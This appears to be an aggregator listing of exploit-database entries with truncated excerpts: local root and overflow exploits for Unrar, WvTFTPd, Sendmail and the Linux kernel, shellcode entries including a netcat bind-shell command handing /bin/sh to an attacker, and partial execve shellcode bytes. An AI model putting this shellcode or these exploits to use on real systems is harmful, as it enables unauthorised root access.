Unrar 3.9.3 - Local Stack Overflow Exploit

No description provided by source. !/usr/bin/perl =head1 TITLE Winrar = v3.93 Local Stack-based Overflow exploit =head2 DESCRIPTION This script triggers a buffer overflow attack against Unrar, the linux popular version of WinRar extractor. It was not developped to bypass non-executing stack...

linux x86 nc -lvve/bin/sh -p13377 shellcode

No description provided by source. linux x86 nc -lvve/bin/sh -p13377 shellcode This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker Author: Anonymous Site: http://chaossecurity.wordpress.com/ Here is code written in NASM ///////////////////////////// secti...

WvTFTPd 0.9 - Remote Root Heap Overflow Exploit

No description provided by source. / wvtftp option name heap overflow remote root exploit infamous42md AT hotpop DOT com exploitation is not exactly straight forward. When we overflow our buffer, we overwrite a pointer that is freed before we get to trigger our overwrite. so we have to restore th...

[Dissy] Graphical frontend to the objdump disassembler

Dissy is a graphical frontend to the objdump disassembler. Dissy can be used for debugging and browsing compiler-generated code. Download Dissy...

linux/x86 execve/bin/dash 42 bytes

linux/x86 execve/bin/dash 42 bytes. Shellcode exploit for linux platform / linux/x86 execve/bin/dash 42 bytes Author : X-h4ck [email protected], [email protected] www.pirate.al , www.flashcrew.in Greetz : mywisdom - Danzel - Wulns - IllyrianWarrior- Ace - M4yh3m - Saldeath ev1lut1on - Lekosta -...

linux/x86 execve(/bin/dash) 42 bytes

/ linux/x86 execve/bin/dash 42 bytes Author : X-h4ck email protected, email protected www.pirate.al , www.flashcrew.in Greetz : mywisdom - Danzel - Wulns - IllyrianWarrior- Ace - M4yh3m - Saldeath ev1lut1on - Lekosta - Pretorian - bi0 - Slimshaddy - d3trimentaL CR - Hack-Down - H3ll - d4ntesA -...

Linux Kernel 2.6.39 3.2.2 (x86x64) - Mempodipper Local Privilege Escalation (2)

Linux Kernel 2.6.39 3.2.2 x86x64 - Mempodipper Local Privilege Escalation 2 / Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c Blog post about it is here: http://blog.zx2c4.com/749 / / Mempodipper by zx2c4 Linux Local Root Exploit Rather than put my write up here, per...

Unrar 3.9.3 - Local Stack Overflow

Unrar 3.9.3 - Local Stack Overflow !/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820;...

HT Editor 2.0.18 - File Opening Stack Overflow

HT Editor 2.0.18 - File Opening Stack Overflow Exploit Title: HT Editor File openning Stack Overflow 0day Date: March 30th 2011 Author: ZadYree Software Link: http://hte.sourceforge.net/downloads.html Version: Thanks =cut use 5.010; my $esp, $retaddr; my $scz =...

FreeBSD TOP Format String Vulnerability

No description provided by source. / freebsd x86 top exploit affected under top-3.5beta9 including this version 1. get the address of .dtors from /usr/bin/top using objdump , 'objdump -s -j .dtors /usr/bin/top' 2. divide it into four parts, and set it up into an environment variable like "XSEO=" ...

Dr.Web AntiVirus 4.33 - LHA long Directory name Local Overflow

Dr.Web AntiVirus 4.33 - LHA long Directory name Local Overflow / stetoscope.c: Dr.Web 4.33 antivirus LHA directory name heap overflow for linux - Howto: Find a valid GOT entry to hijack with objdump -R /opt/drweb/drweb . I guess that you can use the address of free, but my exploit uses the addres...

RHEL 2.1 : binutils (RHSA-2005:763)

An updated binutils package that fixes minor security issues is now available. This update has been rated as having low security impact by the Red Hat Security Response Team. Binutils is a collection of utilities used for the creation of executable code. A number of bugs were found in various...

Sendmail 8.11.x (Linuxi386) - Local Privilege Escalation

Sendmail 8.11.x Linuxi386 - Local Privilege Escalation / sendmail 8.11.x exploit i386-Linux by [email protected] sd@ircnet This code exploits well-known local-root bug in sendmail 8.11.x, 8.12.x may be vulnerable too, but I didn't test it. It gives instant root shell with +s sendmail 8.11.x, x 6 We're usi...